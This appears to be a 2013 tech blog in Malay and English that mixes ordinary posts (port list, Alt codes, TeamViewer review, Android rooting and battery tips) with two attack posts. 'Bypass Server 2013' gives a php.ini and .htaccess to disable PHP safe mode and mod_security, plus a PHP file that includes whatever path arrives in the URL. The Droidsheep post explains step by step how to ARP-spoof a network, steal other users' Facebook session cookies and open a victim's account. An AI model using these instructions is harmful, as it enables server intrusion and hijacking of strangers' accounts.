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Wednesday, 29 May 2013

Apa itu port?

Apa itu port?

Port diibaratkan sebagai sebuah pintu keluar masuk traffic dari internet ke sesebuah komputer.

Cuba bayangkan rumah tanpa pintu? Pasti nampak kelakar kan? Hehe

Namun port yang terbuka juga boleh membawa risiko serangan oleh cracker, mereka mampu memanfaatkan port yang terbuka untuk masuk ke dalam sesebuah sistem dan menanam backdoor supaya mereka dapat keluar masuk dengan mudah.

Disini kita lihat beberapa jenis port dan kegunaan setiap port tersebut... :)

80    : Http
25    : Mengirim email  (SMTP)
110    : Menerima email (POP3)
21    : FTP
22    : SSH
23    : Telnet
43    : whois
53    : DNS
68    : DHCP
79    : Finger
115    : SFTP
119    : NNTP
123    : NTP
137    : NetBIOS - ns
138    : NetBIOS - dgm
139    : NetBIOS
143    : IMAP
161    : SNMP
194    : IRC
220    : IMAP3
389    : LDAP
443    : SSL
445    : SMB
666    : Doom
993    : SIMAP
995    : SPOP

Wednesday, 15 May 2013

Bypass Server 2013

  1. Bypass Safe-Mode and Symlink For Servers Php 5.2.17 2013 By Mauritania Attacker.
  4. #PHP.INI CODE :
  6. safe_mode = OFF
  7. disable_functions = "ln, cat, popen, pclose, posix_getpwuid, posix_getgrgid, posix_kill, parse_perms, system, dl, passthru, exec, shell_exec, popen, proc_close, proc_get_status, proc_nice, proc_open, escapeshellcmd, escapeshellarg, show_source, posix_mkfifo, mysql_list_dbs, get_current_user, getmyuid, pconnect, link, symlink, pcntl_exec, ini_alter, pfsockopen, leak, apache_child_terminate, posix_kill, posix_setpgid, posix_setsid, posix_setuid, proc_terminate, syslog, fpassthru, stream_select, socket_select, socket_create, socket_create_listen, socket_create_pair, socket_listen, socket_accept, socket_bind, socket_strerror, pcntl_fork, pcntl_signal, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, openlog, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, virtual, chmod, file_upload, delete, deleted, edit, fwrite, cmd, rename, unlink, mkdir, mv, touch, cp, cd, pico"
  8. safe_mode_gid = OFF
  9. open_basedir = OFF
  10. register_globals = ON
  11. exec = ON
  12. shell_exec = ON
  13. allow_url_fopen = ON
  14. file_uploads = ON
  15. disable_classes =
  16. safe_mode_include_dir =
  17. safe_mode_exec_dir =
  18. safe_mode_gid = OFF
  19. short_open_tag = ON
  20. log_errors = ON
  21. log_errors_max_len = 1024
  22. ignore_repeated_errors = ON
  23. register_globals = OFF
  24. magic_quotes_runtime = OFF
  25. magic_quotes_gpc = ON
  26. AddHandler application/x-httpd-php4 .php
  27. display_errors = OFF
  30. #INI.PHP CODE :
  32. <?
  33. echo ini_get(“safe_mode”);
  34. echo ini_get(“open_basedir”);
  35. include($_GET["file"]);
  36. ini_restore(“safe_mode”);
  37. ini_restore(“open_basedir”);
  38. echo ini_get(“safe_mode”);
  39. echo ini_get(“open_basedir”);
  40. include($_GET["ss"]);
  41. ?>
  46. <IfModule mod_security.c>
  47. FucKFilterEngine Off
  48. FucKFilterScanPOST Off
  49. FucKFilterCheckURLEncoding Off
  50. FucKFilterCheckUnicodeEncoding Off
  51. </IfModule>

Monday, 15 April 2013


Alt + 0153..... ™... trademark symbol
Alt + 0169.... ©.... copyright symbol
Alt + 0174..... ®....registered ­ trademark symbol
Alt + 0176 ...°......degre ­e symbol
Alt + 0177 ...± ­-minus sign
Alt + 0182 ...¶.....paragr ­aph mark
Alt + 0190 ...¾....fractio ­n, three-fourths
Alt + 0215 ....×.....multi ­plication sign
Alt + 0162...¢....the ­ cent sign
Alt + 0161.....¡..... ­.upside down exclamation point
Alt + 0191.....¿..... ­upside down question mark
Alt + 1.......☺ ­iley face
Alt + 2 ......☻.....bla ­ck smiley face
Alt + 15.....☼ ­n
Alt + 12......♀.....f ­emale sign
Alt + 11.....♂......m ­ale sign
Alt + 6.......♠.....s ­pade
Alt + 5.......♣...... ­Club
Alt + 3.......♥...... ­Heart
Alt + 4.......♦...... ­Diamond
Alt + 13......♪.....e ­ighth note
Alt + 14......♫...... ­beamed eighth note
Alt + 8721.... ∑.... N-ary summation (auto sum)
Alt + 251.....√.....s ­quare root check mark
Alt + 8236.....∞..... ­infinity
Alt + 24.......↑..... ­up arrow
Alt + 25......↓...... ­down arrow
Alt + 26.....→.....ri ­ght arrow
Alt + 27......←.....l ­eft arrow
Alt + 18.....↕......u ­p/down arrow
Alt + 29......↔...lef ­t right arrow

Cookie Facebook dari Droidsheep (android) Ke Mozilla (pc)

Droidsheep adalah salah satu alternatif dari Faceniff yang disediakan secara percuma dan bersumberkan terbuka. Anda boleh memuat turun Droidsheep secara percuma di halaman asalnya di SINI. Bagi yang tidak mengetahui apa itu faceniff dan droidsheep, ia adalah salah satu aplikasi untuk peranti android dan digunakan untuk membuat sesi pembajakan (hijacking) dimana ia menyokong laman web seperti facebook, flickr, twitter, yahoo, amazon dan lain-lain. Untuk menjalankan aplikasi droidsheep ini, anda perlu root terlebih dahulu telefon pintar anda.
Berbanding dengan Faceniff, droidsheep dapat menangkap lebih banyak session dan sniff mana-mana halaman yang dicari pada google termasuklah pengkilanan blog iaitu Innity. Di sini fungsi yang menarik ada pada Droidsheep adalah anda dapat memindahkan keluar cookie yang telah ditangkap melalui email anda sendiri samaada Gmail ataupun Yahoo. Pada tutorial ini saya hanya mengajar anda semua bagaimana untuk memindahkan cookie facebook dari droidsheep ke pelayar mozilla.
1.) Perkara pertama yang perlu anda lakukan ialah root telefon pintar anda dan memuat turun aplikasi Droidsheep di SINI
2.) Seterusnya pasangkan droidsheep dan jalankannya. Tick pada ARP-Spoofing dan juga pada Generic mode. Selepas itu tekan butang Start untuk memulakan proses sniffing
3.) Tunggu beberapa minit dan jika anda mendapat facebook seseorang, hanya klik pada facebook session tersebut dan pergi pada Export via Email

4.) Pilih email anda. Saya menggunakan Gmail dan menghantarkannya pada Yahoo. Seterusnya masukkan alamat email yang hendak dihantar dan tekan sahaja butang send email
5.) Kini email tersebut telah berjaya dihantar dan sekarang pergi semak peti masuk anda
6.) Seterusnya apa yang perlu anda lakukan ialah memasang addons Cookie Manager+ pada pelayar mozilla. Muat turunnya di SINI
7.) Pasangkannya dan restart semula pelayar mozilla. Buka Cookie Manager+ dan masukkan cookie yang diperlukan. Lihat gambar di bawah untuk memahami bahagian mana yang perlu dimasukkan dan ditukarkan pada Cookie Manager ini. Ikuti urutan dari no 1 sampai ke no 4.
8.) Selepas memasukkan cookie tersebut, tutup sahaja Cookie Manager dan pergi pada facebook dan refreshkannya. Kini anda boleh mengakses segala-galanya termasuk membuka chat pada facebook si mangsa dengan pantas dan cepat bila dibandingkan dengan membukanya dari droidsheep sahaja.
Nota Kaki : Selamat mencuba. Jika terdapat sebarang masalah boleh tinggalkan komen di sini :D

Thursday, 11 April 2013

TeamViewer 7 info

Teamviewer logoSummary 
Product Name       : TeamViewer (Version 7.0.12541)
Developed By        : TeamViewer GmbH
OS Support             : Windows 7/Vista/XP, Mac OS X, Linux, Android, iOS
Released on           : Version 7.0.12541 January 20, 2012
License                    : Proprietary, Free for private usage.
Cost (INR)              : Starting from Rs. 28,500
Full Review
Teamviewer is the best application you can get for remote access of PC via Internet for file sharing and presentations.  Though it is proprietary for the corporations, it is free for the individuals, using for non-commercial purposes. It is a single package for Remote access, desktop sharing, online meetings and web conferencing. TeamViewer is the worthy tool for the remote access.

Teamviewer allows you to use it in two ways. Either you can install the application and use it, or you can simply run it by the “Quick Support” Feature. Teamviewer_Screenshot_RunBy this, accepting the EULA (End User License Agreement) lets you use the application rather than installation. It doesn’t need any administrator privileges.
The new features include VoIP audio,Video Conferencing and Integrated teleconferencing. These features gives an edge over the others.
To start an online meeting the presenter gives the Meeting ID to their participants. They join the meeting by using the TeamViewer full version or by logging on to and enter the Meeting ID.
File Transfer is simple with TeamViewer. A simple drag and drop makes your file reach destination.
TeamViewer supports multiple monitors. It is useful to access the computers, if you and your clients use more than one monitors. But TeamViewer, teams up those and brings it into a single screen.multi_monitor_supportSo, you don’t have to toggle between the windows. You can simply work with both the windows simultaneously.
TeamViewer has incorporated an in built screen shot feature. So you don’t have to rely on “PrintScreen” button or snipping tool in Windows 7.
You can record your sessions in TeamViewer, edit and it and convert it to AVI format and watch it. Making your Tutorial videos is easier now.
Bottom Line
TeamViewer teams up  your activities and brings productivity. Surely a worthy tool for Remote access.
Ideal For Business Corporations and Individuals for Private usage.
[xrr rating=4.5/5]
One Liner Designed for the TeamWork!
Download link for TeamViewer 7.0.12541 [4.86MB]

How to keep your Android device free from Malwares

Android may be the leading smartphone operating system in the technology market, at this time with probably the most of the readers of the post, possessing an Android smartphone. Now with the Android smartphone offering an open platform for the people to build up applications, therefore provides money to be earned by people by program using the free Android tools supplied by Google.
Android malware
Protect your Android device from Malware
But there is certainly a disadvantage of the open platform of the Android. Some individuals target the security of the smartphones to get the owner’s private information by developing the malwares. For the newbies, allow me to introduce the word ‘Malware’ which means dangerous applications, which effect the performance of the apparatus by introducing bugs and errors.
So, after purchasing an expensive smartphone, the people must take care about the security of the smartphone to be protected from the malwares. In this article, I have shared the suggestions and precautions to help keep your Android smartphone safe.
Antivirus and Anti-Malware applications
Nearly all of the people usually do not install the antivirus for the tablets and phones, believing that the smartphones could not be effected from the malwares. Nevertheless, based on my views, every Android customer should install an antivirus program for his/her mobile, which may atleast keep your mobile protected from threats.
It really is the initial step of the consumer towards his android smartphone protection. A few of the of use and working anti-malware applications are Avast Mobile Security and BitDefender. The the others like Fast Heal, Doctor. Internet and AVG are equally of use.

Check before installing an application

The maximum degree of threats and malwares are introduced in to the smartphone by careless installation of applications from publishers. A great deal of malware effected applications can be found in the Google Play Store, since, the Android smartphone is open source.
Therefore, you might take a check out the application publishers and then have a step of progress to go through the Install button, when you discover the application to be safe enough. Its eyes can be closed by one to set up the applications from the very best developers of the Android market.
The instances of some top developers of Android OS are Rovio Mobile Ltd, Google, MiniClip, Alphanso Laboratories, Zepto Labs and so on. The developers need to preserve their quality and so they themselves steer clear of the threats and malwares from their applications.
Throughout the study of the publishers, you may even take a look on the permissions of the applications. If the permissions are according to the application’s use, then just go for installing the application form. The if your Notes or memo application needs consent to proceed through the memory, which means you have to ignore the application.

Users Reviews play bigger role

The man shall first have a glance on the program reviews written by the users in the opinion section. The users’ reviews assist a very clear notion concerning the program. I would rather select an individual reviews of exactly the same apparatus that you possess. This can enable you to have virtual perspective about the characteristics of the errors, its bugs and the program.
The application shall never be never judged by one based on the stars evaluations of the application because the stars have really no definition. It really is the users program, which may be advantageous for the smartphone protection.

Prevent 3rd party applications

Sometimes, one refers to the third party sites to download the .apk files for a particular program to his/her smartphone for the reason that it would cost nothing as opposed to some charges on the Google Play computer software. The APK files bring malwares to your device, that may therefore obtain your device’s related private information. Therefore, you ought to be unwilling in selecting 3rd party applications.

Lookout Anti-Virus Alert

This is an effective means to help keep your Android apparatus safe as this program would create and automatic alert with the malware kind with an alternative to Quarantine or Discount options, when a danger or a virus or a non-related executable file is detected.
Therefore, the preceding techniques are actually successful.
In the other instance, if you also know even more ways to help keep Android smartphone safe, then make us know by commenting below.

How To: Android Rooting and Flashing – Pros and Cons


It means getting the root access of the android mobile. On installing the root package the handset provides the access to all the system files. Android Rooting is mainly performed to overcome the limitations of the handset. Android Rooting is similar to ‘jailbreaking’ in iOS. Most of the 2012 devices are pre-loaded with the root permission.

Procedure to ROOT Android Device

STEP 1: Download the required root update package by searching over the internet.
STEP 2: Copy the package to the SD Card
STEP 3: Backup all your data for security purpose.
STEP 4: Switch off the handset and switch ON by pressing both the Power button and the Volume UP button simultaneously to enter the recovery mode (The key combination may vary from various handset)
STEP 5: Select the option “INSTALL UPDATE FROM SD CARD” and select the update package
STEP 6: Restart the mobile. Now your handset is rooted. If you want to unroot your device, repeat all the steps but instead of the ROOT package use the UNROOT package.
Rooting installs an 3rd Party App called the SuperUser. This app provides the root access to most of the app like (LINK2SD, ROM MANAGER, Screenshot IT, etc.).


Speed-up your device: Rooting gives access to the LIND2SD app which allows you to freeze the running apps. Hence most of the background running apps are closed which frees up the RAM.
More Space: All the apps can be moved to the SD card which gives more internal space for the low-memory devices. All the unnecessary in-built apps can be removed.
Take Screenshots: Screenshots can be taken. This feature is in-built in the ICS devices.
Customise your Android: All the System apps can be replaced (i.e.) you can change your boot logo with an image, cancel all the start-up apps, etc.
Get the latest Version of Android: You can get the latest update before it is officially released.


Warranty Void: Rooting comes under the ‘Terms and Conditions’ of Google. According to which the warranty is void is the phone is Rooted. In some cases the Android market also is removed from your device.
Low SecurityYour device is now open which means it has no security. A malicious app can damage your device to a great extent. Is your device is subjected to any threat you might even brick your phone. The term brick means ‘Your phone is dead!!!’
Warning: I owned a Samsung Galaxy Ace and I rooted it and I replaced the music app with the incompatible version the app and within two days my Android market was removed and later I tried to install the Xperia Home Screen app into my mobile and I got bricked. Rooting is a total risk. Don’t be afraid, I flashed it and got back my warranty.


Flashing means removing the stock ROM and installing a different ROM in your Android device. For most of the older mobiles you may need to flash the kernel also. The best method to flash your device is using the flash tool.

Procedure to FLASH Android Device

STEP 1: Unlock your mobile’s boot loader. This procedure changes for every mobile and the procedure will be available in the manufacturer’s official forum.
STEP 2: Install the flashtool in your PC. The flashtool can be downloaded from the internet.
STEP 3: Get the flash file of the Kernel. The flash file has an extension of .tft which is to be downloaded from the internet.
STEP 4: Open the flash file in the flashtool and connect your phone. Your phone is ready to be flashed. Now click on the flash button.
STEP 5: Copy the custom ROM file (.zip) in the SD and go into the recovery mode and select the option “INSTALL UPDATE FROM SD CARD” and select the ROM package
STEP 6: If the mobile doesn’t have an recovery mode then the ROM also can be flashed in the flashtool.
  • Reboot the device into flash mode.
  • Wipe your device
                         flashboot –w
  • Update your ROM
                         flashboot update </path/to/your/>
STEP 7: Restart your mobile and enjoy..!!
Note: If something goes wrong, there is a high possibility of getting bricked. My friend uses a Sony Ericson Xperia Mini in which the STOCK ROM was 2.1. But he flashed both the kernel and ROM and now has Android 4.1 with more features like Wi-Fi tethering, Wi-Fi Direct, etc. Flashing is risky but beneficial.
Readers! I hope these tips will help you a lot. We’d love to guide you. Incase, you encounter an error or want to make some suggestions share with us through comments.

Android: Custom ROMs – Pros and Cons

Now-a-days the use of phones have become part of our lives, they not used for making calls and sending messages but also in doing variety of tasks. It’s all due to the introduction of smartphones. Android a well-known mobile operating system has now became the choice of various smart phone manufactures like Sony, Samsung, HTC etc. It is all due to the open-source feature it offers than other operating systems like Windows Phone and Symbian.
A Stock ROM is the version of the phone’s operating system that comes pre-installed with your phone. Even though the firmware are the same the ROMs differ with each mobile. For example, the UI (user interface) of Sony mobile varies with that of Samsung and HTC, even it runs with the same android operating system in same version.
 HTC wildfire  sony experia sola  samsung galaxy ace
HTC Wildfire Sony Xperia Sola Samsung Galaxy Ace
All mobiles running the same 2.3.7 Android version
A Custom ROM is a fully standalone version of the OS, including the kernel (which makes everything run), apps, services, etc. Everything you need to operate the device, except it’s customized by someone in some way. There are many custom ROMs available over the internet for free.

Top 5 Custom ROMs

#1. Cyanogen

CyanogenMod is an open source replacement firmware for smart phones and tablet computers based on the Android mobile operating system. It offers features and options not found in the official firmware distributed by vendors of these devices.

#2. GingerVillain 

This is an upcoming Android 2.3 ROM. It also supports some CyanogenMOD extras and applications. It includes most of the basic Android apps and much more features and customizations which come with this ROM.

#3. ReDux

ReDux ROM is designed to deliver three key features – stability, speed and cleanliness. It is a simple yet beautiful ROM which works smoothly on all the supported devices. The ROM is supposed to be completely bug free and it uses an extension partition on your SD card which provides extra space utilization for your applications.

#4. MIUI

It comes officially pre-installed on MIUI Android Smartphones. Though it does not support devices like CyanogenMOD, it is available for a decent number of android phones. The User Interface is smooth and pleasant to use. It also includes additional features like enhanced apps, smart dialling and enhanced notifications.

#5. Insert Coin

It adds features like panoramic camera, modified browser, more tabs and settings. Additionally, it has feature which allows your CPU to run at a high frequency preventing meltdown and there are also a few GPU tweaks.

Useful A to Z Technology Blogs List

Finally I decided to write something different. Here I have compiled a list of useful technology blogs sorted out alphabetically. I have tried my best to sort these. In case, any popular blog is missing, please let me know through the comments. The criteria I have taken into consideration is their popularity and Technorati rankings, which is an authentic one. But, to fill out some alphabets which are not in Technorati top blogs list, I have added some lesser known, but useful blogs.
As a reader, I ask you to suggest favourite technology blogs to the list through the comments as it will be useful to the masses. Strictly no self promotion!
B –
Source: Technorati, Faceboo

Best Ways to Protect your own Android Device

Ever since the Android smartphones came to the market they had a rapid growth. So does the threats in it. At the same time more critical data are stored in these smartphones. Hence there is a necessary of protecting your valuable data. Here are some ways in which you can safe guard your data.

Using Screen Lock Feature

All the Android phones have an inbuilt screen lock feature. It can be activated in the Settings. The screen lock can be a Pattern, PIN, or Text.
protection in android
You need to give the right password to unlock the Android smartphone. But it has some loopholes that the screen lock can be bypassed or can be removed by flashing the device. You can watch the bypass of the screen in Motorola in

Using third-party apps

Here are some best apps which help your privacy.

#1. Backup all SMS

SMS Backup and Restore

This is a free Android app to back-up all the SMS in the mobile. It has a feature to upload in the Dropbox after every backup. It also offers other features like scheduled backup, upload to Dropbox only in Wi-Fi, password protection, archive mode (to save all SMS in a single file), save all SMS as XML file which can be opened in PC.


- The SMS are not automatically deleted after a schedule Backup.
– The app gets killed in Task Manger. So the scheduled backup often Fail.

#2. Hide the apps and Gallery

Most of the launchers like Go Launcher, Holo Launcher, etc. have an option to hide apps from App drawer window so that selected apps can be hided but when using the default theme, the phone has to be rooted to hide the apps.


- The app has to be deselected from the settings to show the app every time.
– The app shows up automatically wen the default launcher is opened.
– Very Easy to unlock.

Hide It pro

This is the best app for Android to hide Pictures, Videos, Messages and calls.


1) App disguised behind a fully functional Audio Manager
2) Easy to hide by just selecting “Audio Manager” in the share Option
3) Delete/Share/Unhide/Move pictures between albums
4) Runs even in low end phones.
5) Not shown in recent apps list
6) Two lock screen options viz Pin and Password
7) Escape pin/password for times when you get caught.
8) Incoming messages are shown as Error.
9) The add-on hides the app from the app drawer and the app can be opened bya secret code.
10) Built in encryption tool(with military standard 256-bit AES encryption) to secure your most important files
11) Plugins for features like Private Messaging / Calls , Private Browsing , Locking Apps.


- Has some minor bug that the lock screen of the app can be bypassed when the locked app is open by the notification bar. For example, when you receive a message in Whatsapp or Viber and you open the app by clicking the notification bar, the app is opened even though the app is locked.
– Needs root status to hide apps.

#3. Anti-Theft

Avast Mobile Security

Having over 10 million users, it is a best anti-virus for your Android smartphone. It has a very good anti-theft feature. This app takes up the device administration and also the settings are protected by a PIN. Hence the app cannot be uninstalled without the pin and phone can’t be formatted without uninstalling the app.
It has the remote command Feature which helps you to find the smartphone very easily. For example, Just a message “2222 SIREN ON” (2222 is the Avast PIN) from any number to the lost smartphone turns ON the siren. It has very good built in features.


- Needs to be rooted to use the Locate feature that turns on the GPS automatically to locate the lost phone.

Top 10 Websites for Mastering Photoshop

photoshop logoAn art is an expressionism! An artist could have multiple imaginative thoughts, but might struggle to portray. The assistance of suitable software makes it simple. In the beginning, the artists drew everything that impressed them. Later they captured the pictures of everything that fascinated them. Now they edit the photos taken, making it look more enthralled.
photoshop logo
Every software that is been developed for this includes several designing options to make works effortless. Photoshop is one such photo editing software that change the actual look of a picture. It holds a number of effective options. The options provide ways to add more glow to the piece of art.
Evolution of PS Toolbar
Evolution of PS Toolbar
There are various websites that makes it available for the users to draw and edit on Photoshop. Some of the best websites to master photoshop skills are:

Photoshop Learning Destinations

#1. Psd.Tutsplus is an obliging site to learn how to work with Photoshop. It has a list of articles which is applicable for the beginners and advanced learners.

#2. PhotoshopLady

Photoshop Lady
The has a roll of tutorials on several topics such as 3D effect, abstract effect, drawing effect, text effect, photo effect etc to practice Photoshop.

#3. Abduzeedo

abduzeedo is preferred for inspirational designers. Along with some of the best tutorial tips for Photoshop, lessons on Illustrator, Pixelmator and Web Design software.

#4. PSD Vault

PSD Vault has fine resources on Photoshop. Tutorials from basics to advanced along with on text and photo effects. It also includes VIP exclusive Photoshop tutorial.

#5. Tutorial9

Tutorial 9
The has fine tutorial lessons and also free downloads of fonts, icon packs, photoshop brushes, texture packs, vector packs, UI & graphics etc.

#6. Pixel2Life provides a tutorial for every week. Along with photoshop, it has lessons on Adobe Flash, 3D Studio Max, PHP coding etc.

#7. Adobe Tutorialz

Adobe Tutorialz
The covers all the needs on studying to use Photoshop. The lessons are worth to be practiced.

#8. Textuts

The Textuts tutorials are of great fun to have with text effects and techniques under Photoshop. The study would help both the beginners and advanced learners.

#9. PSDfan Extra

The provides teachings on text & photo effects, icon & web design. Offers articles on 30 minutes re-design concepts in Photoshop and also supplies downloads of textures, icons, brushes etc.

#10. Luxa

Luxa grants tutorials along with videos. The lessons are featured and provides enough knowledge on Photoshop.
I believe this list helped you in lots of ways. Share your favourite Photoshop Learning Destinations with us through comments!

5 Free Apps to Boost your Android Phone

android-performanceAndroid phones are very much like their larger computing machines. They need to be maintained in a proper way. Most of the times we find that after a couple of months usage of our smartphone  starts becoming sluggish. There is also a case wherein you have to charge the battery frequently. These problems mainly occur due to the ‘garbage’ items running in the background and the internal memory being filled by these items.
Boost your Android Performance
They also drain the battery which in turn reduces battery life. To put an end to this some developers have created some apps which allows you to clear off the garbage and make your phone as slick as it was in the start. And the best part is that many such apps are free of cost. So here are 5 free apps for speeding up your android phone. Just keep in mind that some of these apps requires you to unlock the phone which might make you lose your warranty, thus be careful.

#1. Android Assistant

Android Assistant in the one stop for all resource management in your phone. It provides you with a number of utilities like the overall phone monitor, cache process manager, and quick booster. The monitor allows you to have an overview about you CPU, RAM, and battery. The quick booster is designed to kill preselected apps to instantly speed up the system while the process manager allows you to manually choose and remove the processes. Also one of its features include a startup manager which allows you to block unwanted apps from running in background when your phone starts.

#2. CPU Tuner

Now this is an interesting app. It allows you to under-clock or over-clock your CPU as and when you need it. Wicked right? Too bad it works only on unlocked devices. It also allows you to manage data connections and sync your whole device into working as one unit which saves a lot of power.

#3. Move2SD Enabler

Most budget android phones have very low internal memory. This combined with the irritating feature of these phones to eat up a lot of that scarce space in having default apps makes it difficult to install new apps. Move2SD Enabler allows you to move these files from your phone and send it to the memory card. It also allows you to change the default loctaion of installation from phone to SD card. Again this app requires an unlocked phone. This in turn tunes up your RAM to run at higher speeds making your phone slicker than before.

#4. SD Speed increase

Another app which requires rooted android phone, this app is designed to increase the transfer rate of files between your phone and memory card by increasing the cache size. It also boosts up your casual read-write functions, but the change is only slightly noticeable.

#5. 1Tap cleaner

1Tap is basically a temporary file cleaner. it clears out any remaining garbage memory in cache, or history, etc. Its features include auto cleaning in which you can schedule a set interval after which the app will clean the phone by itself.
I hope these apps will boost your Android Phone. Drop your experiences as Comments. We’d love to hear from you!

20 Tips to Increase Android Battery Life

Android and other smart phones get a general comment that smart phones drain the battery life. But the life of the device also depends on how we use them. If we use it with care, it lasts longer than any other thing. Here we give some tips which help android users to increase their battery-life. The tip which you follow depends on your use of the phone and it varies with person to person. So, follow the tip that chooses you best. Before beginning, you need to look in to the settings to see what is using your battery the most.  To see that go to Settings->About phone->Battery use
Battery Settings
Battery Settings

#1. Reduce your Screen Brightness

Display uses about 5-80% of battery usually. Reducing the brightness helps to increase the battery life a lot. To do so goto Settings->Display->Brightness

#2. Disable Wi-Fi, Bluetooth, GPS, NFC

Even though Wi-Fi, GPS and Bluetooth are designed for low-power consumption, they drain the battery. Most of the 2012 android devices have a unique feature known as NFC (Near Field Communion). This feature enables a sensor field around the handset and is used for sharing. This also drains the battery unnecessarily. So it’s better to turn off the Wi-Fi, Bluetooth and NFCs when it’s not in use.

#3. Use Wi-Fi Sleep Policy

While the Wi-Fi is not in use and you will turn it ON within minutes, use the Wi-Fi Sleep Policy. This feature shuts down the Wi-Fi temporarily on the handset. To do so, goto Settings->Wireless & networks->Wi-Fi settings->Advanced->Wi-Fi sleep policy
Wifi sleep policy
Wi Fi Sleep Policy

#4. Always be updated

You may be wondering how updating helps to increase the battery life. But it’s true. The updates are designed for low power consumption; hence it prolongs the battery life. Likewise, the latest android version, the better. For example, Ice-cream Sandwich consumes less power compared to Honeycomb and similarly Jellybean consumes less power compared to Ice-cream Sandwich.

#5. Avoid Live Wallpaper

The live wallpaper drains the battery to a considerable rate. So it’s better to use static wallpapers rather than the live wallpaper.Also use images which contain black color because the LED screens use less power to display black than displaying white. Doing this helps to increase the battery life up to 10%.

#6. Disable background Data traffic

This feature in android disables all the apps that use the internet to update automatically in a certain time interval. Disabling this feature saves more data traffic. Some of the apps which use the background data traffic are GMail, Whatsapp, Facebook, Viber, Twitter, LinkedIn, Google Play, etc. These apps checks for the updates and for incoming messages all time. So it’s better to disable the background data traffic. To do so, go to Settings->Accounts & sync-> Background data traffic
Note: There is no option to disable this feature in some handsets. 

#7. Disable Auto-Sync

This option comes under the background data traffic. This feature checks for the mail all the time. Which means you will be able to get the mail in your handset as soon as the mail arrives. But this service uses a considerable amount of battery. To do so, deselect the text box in Settings->Accounts & sync->Activate auto-sync.

#8. Use Bluetooth Discoverable Timeout

You need to make the device to be discoverable while pairing a new device through Bluetooth. Even though Bluetooth drains the battery, making it discoverable drains more. But the device has to made discoverable, so there is a new feature called Discoverable timeout. This feature disables the discovery of Bluetooth device in a certain time limit.
Bluetooth Timeout
Bluetooth Timeout

#9. Prefer Wi-Fi rather than GPRS

It may be weird that the GPRS consumes more power when compared to Wi-Fi. For example, Wi-Fi consumes 5% charge; the GPRS connection consumes 15% charge. This may not be seen while viewing websites but in case of watching a video in YouTube or making a call in a VoIP service, it drains the battery at a rapid rate. So it’s better to use Wi-Fi to watch videos or making calls.

#10. Upload only in Wi-Fi

Some cloud services like Dropbox,, SkyDrive, etc. has a feature called Auto-Upload which uploads the photos takes from the camera automatically to the cloud. This feature may not be needed to many users, but in case if it is needed then prefers Wi-Fi and not GPRS. This should be changed in the settings of the app.

#11. Turn OFF push notifications

Social apps often display push notifications alerting you the updates within the apps. For example, Facebook displays “Has added a photo of you”. By shutting these off, you can save battery life on your handset. It should be disabled in the settings of every individual app.

#12. Disable Auto-update in Google Play

The Google Play service checks for the update of each app and updates itself. This consumes more data traffic and hence the battery. So it’s necessary to disable the auto update of apps and to do it manually. If you prefer to be up-to-date always then use the “Update over W-Fi only” feature.
Disable Auto Update
Disable Auto Update

#13. Do not use more widgets

The more the widgets, more the RAM, more the battery will be drained.

#14. Disable Adobe Flash

Adobe Flash enables to watch videos in websites but it drains the battery a lot. The main reason why adobe discontinued its service from android 4.1 is this battery problem.

#15. Disable unwanted network services

Some phones might be activated 3G services but the person will be using only 2G services. Even though it’s a 2G service, the phone uses the 3G network. There will be wastage of battery. So it’s better to disable it in the network settings.

#16. Prefer a good network

All might know that the phone uses more energy in calls when there is a weak signal. When a good network is available, the phone uses considerable aunt of energy. So it’s better to use a service which gives good network in your area.

#17. Never use Task managers

Task managers may be speeding up the smartphone but they may be consuming more of your battery. So it’s better to uninstall those task managers.

#18. Turn OFF vibrations

The smartphones makes use of some energy to make a vibration, but when “Vibration on Key press” is enabled, while typing a word the phone produces more number of vibrations. It consumes more battery. So it’s better to disable this feature in the keyboard settings.

#19.  Prevent the Handset from getting heated

It’s a weird fact that the battery drains when it is heated. So keep the android phone in a cool place.

#20. Do not try to overcharge

Normally the smartphone charges up in 1-2 hours. But if you charge it throughout the day, it lowers the life-time of the battery. Check the condition of the battery often to have a good battery life.